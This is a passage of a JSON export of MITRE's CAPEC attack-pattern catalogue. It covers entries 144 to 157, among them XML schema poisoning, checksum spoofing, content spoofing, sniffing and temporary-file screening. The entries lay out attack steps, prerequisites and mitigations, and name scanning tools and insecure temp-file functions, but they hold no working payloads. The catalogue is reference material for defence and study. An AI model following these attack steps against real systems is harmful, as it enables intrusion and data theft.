Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"144":{"ID":"144","Name":"Detect Unpublicized Web Services","Abstraction":"Detailed","Status":"Draft","Description":"An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target web site] An adversary finds a target web site that they think may have unpublicized web services"},{"Step":"2","Phase":"Explore","Description":"[Map the published web site] The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree","Technique":["Use Dirbuster to brute force directories and file names to find unpublicized web services","Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked"]},{"Step":"3","Phase":"Experiment","Description":"[Try to find weaknesses or information] The adversary will try to find weaknesses in the unpublicized services that the targeted site did not intend to be public","Technique":"Use Nikto to look for web service vulnerabilities"},{"Step":"4","Phase":"Exploit","Description":"[Follow-up attack] Use any information or weaknesses found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":"The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack."},"Resources_Required":{"Resource":"Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"145":{"ID":"145","Name":"Checksum Spoofing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender\'s checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient\'s checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.","The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.","The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack."]},"Resources_Required":{"Resource":"The adversary must have a utility that can intercept and modify messages between the sender and recipient."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"354"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"}]}},"146":{"ID":"146","Name":"XML Schema Poisoning","Abstraction":"Detailed","Status":"Stable","Description":"An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"271"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine if XML schema is local or remote] Because this attack differs slightly if the target uses remote XML schemas versus local schemas, the adversary first needs to determine which of the two are used."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to XML schema] The adversary gains access to the XML schema so that they can modify the contents.","Technique":["For a local scenario, the adversary needs access to the machine that the schema is located on and needs to gain permissions to alter the contents of the file.","For a remote scenario, the adversary needs to be able to sniff HTTP traffic that contains an XML schema."]},{"Step":"3","Phase":"Exploit","Description":"[Poison XML schema] Once the adversary gains access to the XML schema, they will alter it to achieve a desired effect. Locally, they can simply modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.","Technique":["Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data.","Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.","Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B)."]}]},"Prerequisites":{"Prerequisite":["Some level of access to modify the target schema.","The schema used by the target application must be improperly secured against unauthorized modification and manipulation."]},"Resources_Required":{"Resource":"Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful schema poisoning attack can compromise the availability of the target system\'s service by exhausting its available resources."},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Protect the schema against unauthorized modification.","Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.","Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification."]},"Example_Instances":{"Example":[{"p":["XML Schema Poisoning Attacks can often occur locally due to being embedded within the XML document itself or being located on the host within an improperaly protected file. In these cases, the adversary can simply edit the XML schema without the need for additional privileges. An example of the former can be seen below:","If the \'name\' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur."],"div":["<?xml version=\\"1.0\\"?> <!DOCTYPE contact [ <!ELEMENT contact (name,phone,email,address)> <!ELEMENT name (#PCDATA)> <!ELEMENT phone (#PCDATA)> <!ELEMENT email (#PCDATA)> <!ELEMENT address (#PCDATA)> ]> <note> <name>John Smith</name> <phone>555-1234</phone> <email>jsmith@email.com</email> <address>1 Example Lane</address> </note></capec:Code>",{"style":"margin-left:10px;","class":"attack"}]},{"p":["XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :","The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Adversary-in-the-Middle (CAPEC-94) Attack to alter the schema in the same way as the previous example and to acheive the same results."],"div":["<?xml version=\\"1.0\\"?> <!DOCTYPE contact SYSTEM \\"http://example.com/contact.dtd\\"[ <note> <name>John Smith</name> <phone>555-1234</phone> <email>jsmith@email.com</email> <address>1 Example Lane</address> </note></capec:Code>",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"15"},{"CWE_ID":"472"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"147":{"ID":"147","Name":"XML Ping of the Death","Abstraction":"Detailed","Status":"Draft","Description":"An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"528"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.","Technique":["Use an automated tool to record all instances of URLs to process XML requests.","Use a browser to manually explore the website and analyze how the application processes XML requests."]},{"Step":"2","Phase":"Exploit","Description":"[Launch a resource depletion attack] The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.","Technique":"Send a large number of crafted small XML messages to the target URL."}]},"Prerequisites":{"Prerequisite":"The target must receive and process XML transactions."},"Skills_Required":{"Skill":["To send small XML messages",{"Level":"Low"},"To use distributed network to launch the attack",{"Level":"High"}]},"Resources_Required":{"Resource":"Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"DoS: resource consumption (other)"}},"Mitigations":{"Mitigation":["Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.","Implementation: Provide for network flow control and traffic shaping to control access to the resources."]},"Example_Instances":{"Example":"Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"400"},{"CWE_ID":"770"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Solutions_and_Mitigations"}}},"148":{"ID":"148","Name":"Content Spoofing","Abstraction":"Meta","Status":"Stable","Description":"An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary\'s content instead of the owner\'s content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which they are not authorized. If the content is to be modified in transit, the adversary must be able to intercept the targeted messages."},"Resources_Required":{"Resource":{"p":["If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target\'s communication and generating/creating custom packets to impact the communications.","In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target\'s web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content."]}},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful content spoofing attack compromises the integrity of the application data."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"345"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"12","Entry_Name":"Content Spoofing"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Content Spoofing"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"149":{"ID":"149","Name":"Explore for Predictable Temporary File Names","Abstraction":"Detailed","Status":"Draft","Description":"An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"497","Exclude_Related":{"Exclude_ID":"512"}},{"Nature":"CanPrecede","CAPEC_ID":"155"}]},"Prerequisites":{"Prerequisite":["The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.","The attacker must be able to see the names of the files the target is creating."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"150":{"ID":"150","Name":"Collect Data from Common Resource Locations","Abstraction":"Standard","Status":"Draft","Description":"An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine\'s file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":{"Exclude_ID":"437"}}},"Prerequisites":{"Prerequisite":"The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside."},"Example_Instances":{"Example":"An adversary can use a technique called Bluesnarfing to retrieve data from Bluetooth enabled devices in which they know where the data is located. This is done by connecting to the device\u2019s Object Exchange (OBEX) Push Profile and making OBEX GET requests for known filenames (contact lists, photos, recent calls). Bluesnarfing was patched shortly after its discovery in 2003 and will only work on devices created before or during this time."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"552"},{"CWE_ID":"1239"},{"CWE_ID":"1258"},{"CWE_ID":"1266"},{"CWE_ID":"1272"},{"CWE_ID":"1323"},{"CWE_ID":"1324"},{"CWE_ID":"1330"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1119","Entry_Name":"Automated Collection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Common Resource Location Exploration",{"Date":"2015-12-07"}]}},"151":{"ID":"151","Name":"Identity Spoofing","Abstraction":"Meta","Status":"Stable","Description":"Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The identity associated with the message or resource must be removable or modifiable in an undetectable way."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication","Access Control"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"Employ robust authentication processes (e.g., multi-factor authentication)."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"153":{"ID":"153","Name":"Input Data Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target. For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user\'s data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target\'s processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"20"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"154":{"ID":"154","Name":"Resource Location Spoofing","Abstraction":"Meta","Status":"Stable","Description":"An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}},"Mitigations":{"Mitigation":"Monitor network activity to detect any anomalous or unauthorized communication exchanges."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"}]}},"155":{"ID":"155","Name":"Screen Temporary Files for Sensitive Information","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application\'s routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application\'s temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Look for temporary files in target application] An adversary will try to discover temporary files in a target application. Knowledge of where the temporary files are being stored is important information."},{"Step":"2","Phase":"Experiment","Description":"[Attempt to read temporary files] An adversary will attempt to read any temporary files they may have discovered through normal means.","Technique":["Attempt to get the file by querying the file path to a web server","Using a remote shell into an application, read temporary files and send out information remotely if necessary","Recover temporary information from a user\'s browser cache"]},{"Step":"3","Phase":"Exploit","Description":"[Use function weaknesses to gain access to temporary files] If normal means to read temporary files did not work, an adversary will attempt to exploit weak temporary file functions to gain access to temporary files.","Technique":["Some C functions such as tmpnam(), tempnam(), and mktemp() will create a temporary file with a unique name, but do not stop an adversary from creating a file of the same name before it is opened by the application. Because these functions do not create file names that are sufficiently random, an adversary will try to make a file of the same name, causing a collision, and possibly altering file permissions for the temporary file so that it is able to be read.","Similar to the last technique, an adversary might also create a file name collision using a linked file in a unix system such that the temporary file contents written out by the application write to a file of the adversaries choosing, allowing them to read the file contents."]}]},"Prerequisites":{"Prerequisite":"The target application must utilize temporary files and must fail to adequately secure them against other parties reading them."},"Resources_Required":{"Resource":"Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"377"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Activation_Zone, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"157":{"ID":"157","Name":"Sniffing Attacks","Abstraction":"Standard","Status":"Draft","Description":"In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. AiTM attacks are predominantly active and often alter the content of the communications themselves.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"117","Exclude_Related":{"Exclude_ID":"514"}},{"Nature":"CanPrecede","CAPEC_ID":"652"}]},"Prerequisites":{"Prerequisite":"The target data stream must be transmitted on a medium to which the adversary has access."},"Resources_Required":{"Resource":"The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Encrypt sensitive information when transmitted on insecure mediums to prevent interception."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"311"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, 